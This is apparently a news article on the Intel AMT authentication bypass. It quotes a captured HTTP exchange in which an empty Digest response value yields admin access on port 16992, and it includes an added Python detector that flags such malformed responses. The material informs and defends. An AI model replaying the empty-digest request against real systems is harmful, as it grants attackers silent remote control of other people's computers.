A remote hijacking flaw that lurked in Intel chips for seven years was more severe than many people imagined, because it allowed hackers to remotely gain administrative control over huge fleets of computers without entering a password. This is according to technical analyses published Friday.

As Ars reported Monday, the authentication bypass vulnerability resides in a feature known as Active Management Technology. AMT, as it's usually called, allows system administrators to perform a variety of powerful tasks over a remote connection. Among the capabilities: changing the code that boots up computers, accessing the computer's mouse, keyboard, and monitor, loading and executing programs, and remotely powering on computers that are turned off. In short, AMT makes it possible to log into a computer and exercise the same control enjoyed by administrators with physical access.

AMT, which is available with many vPro processors, was set up to require a password before it could be remotely accessed over a Web browser interface. But, remarkably, that authentication mechanism can be bypassed by entering no text at all. According to a blog post published Friday by Tenable Network Security, the cryptographic hash that the interface's digest access authentication requires to verify someone is authorized to log in can be anything at all, including no string at all.

"Authentication still worked" even when the wrong hash was entered, Tenable Director of Reverse Engineering Carlos Perez wrote. "We had discovered a complete bypass of the authentication scheme."

A separate technical analysis from Embedi, the security firm Intel credited with first disclosing the vulnerability, arrived at the same conclusion. It stated:

With a little help of the local proxy at `127.0.0.1:16992`, which is meant to replace the response with an empty string, we're able to manage the AMT via the regular Web browser as if we've known the *admin* password:

```
GET /index.htm HTTP/1.1
Host: 127.0.0.1:16992
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

HTTP/1.1 401 Unauthorized
WWW-Authenticate: Digest realm="Digest:048A0000000000000000000000000000", nonce="qTILAAUFAAAjY7rDwLSmxFCq5EJ3pH/n",stale="false",qop="auth"
Content-Type: text/html
Server: AMT
Content-Length: 678
Connection: close

GET /index.htm HTTP/1.1
Host: 127.0.0.1:16992
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Authorization: Digest username="admin", realm="Digest:048A0000000000000000000000000000", nonce="qTILAAUFAAAjY7rDwLSmxFCq5EJ3pH/n", uri="/index.htm", response="", qop=auth, nc=00000001, cnonce="60513ab58858482c"

HTTP/1.1 200 OK
Date: Thu, 4 May 2017 16:09:17 GMT
Server: AMT
Content-Type: text/html
Transfer-Encoding: chunked
Cache-Control: no cache
Expires: Thu, 26 Oct 1995 00:00:00 GMT

04E6
```

Embedi e-mailed the analysis to reporters, but didn't publish it online.

Making matters worse, unauthorized accesses typically aren't logged by the PC because AMT has direct access to the computer's network hardware. When AMT is enabled, all network packets are redirected to the Intel Management Engine and from there to the AMT. The packets bypass the OS completely. The vulnerable management features were made available in some but not all Intel chipsets starting in 2010, Embedi has said.
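Because the host OS never sees this traffic, detection has to happen on the network. The following is an added example, not code from Embedi, Tenable, or Intel: it parses the `Authorization` header of a captured HTTP request to the AMT port and flags a Digest `response` that is not the 32 hex digits of an MD5 digest (the RFC 2617 default, since the challenge in the capture names no algorithm). The function names are hypothetical, and the sample input is the second request from the capture quoted above with unrelated headers omitted.

```python
import re

AMT_HTTP_PORT = 16992  # port shown in the quoted capture
# auth-param grammar: key=token or key="quoted string"
_PARAM = re.compile(r'(\w+)\s*=\s*(?:"((?:[^"\\]|\\.)*)"|([^\s,]*))')
_MD5_HEX = re.compile(r"[0-9a-fA-F]{32}")  # shape of a real MD5 digest response

# Second request from the quoted capture (headers unrelated to auth omitted).
BYPASS_REQUEST = (
    "GET /index.htm HTTP/1.1\r\n"
    "Host: 127.0.0.1:16992\r\n"
    'Authorization: Digest username="admin", '
    'realm="Digest:048A0000000000000000000000000000", '
    'nonce="qTILAAUFAAAjY7rDwLSmxFCq5EJ3pH/n", uri="/index.htm", response="", '
    'qop=auth, nc=00000001, cnonce="60513ab58858482c"\r\n\r\n'
)


def parse_digest_authorization(raw_request: str):
    """Return the Digest auth parameters of a raw HTTP request, or None."""
    head = raw_request.replace("\r\n", "\n").split("\n\n", 1)[0]
    # Unfold header values that were wrapped onto indented continuation lines.
    head = re.sub(r"\n[ \t]+", " ", head)
    for line in head.split("\n")[1:]:  # skip the request line
        name, _, value = line.partition(":")
        if name.strip().lower() != "authorization":
            continue
        scheme, _, params = value.strip().partition(" ")
        if scheme.lower() != "digest":
            return None
        return {m[1].lower(): m[2] if m[2] is not None else m[3]
                for m in _PARAM.finditer(params)}
    return None


def classify(raw_request: str, dst_port: int) -> str:
    """Label one captured request that was sent to dst_port."""
    if dst_port != AMT_HTTP_PORT:
        return "ignored"
    params = parse_digest_authorization(raw_request)
    if params is None:
        return "no-digest-auth"  # normal first request, answered with a 401
    response = params.get("response")
    if response is None or not _MD5_HEX.fullmatch(response):
        return "alert: malformed digest response"
    return "well-formed"
```

A "well-formed" verdict says only that the field has the right shape, not that the password was correct, so the check is a tripwire for empty or truncated responses rather than a replacement for patching.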

In a blog post published Friday, Intel officials said they expect PC makers to release a patch next week. The releases will update Intel firmware, meaning patching will require that each vulnerable chipset be reflashed. In the meantime, Intel is urging customers to download and run this discovery tool to diagnose potentially vulnerable computers. Systems that test positive should be temporarily secured using this mitigation guide until a patch is supplied. Computer makers Fujitsu, HP, and Lenovo have also issued advisories for specific models they sell.

[Update, 5:40pm EDT] A query of the Shodan security search engine found over 8,500 systems with the AMT interface exposed to the Internet, with over 2,000 in the United States alone.

Many others may be accessible via organizational networks.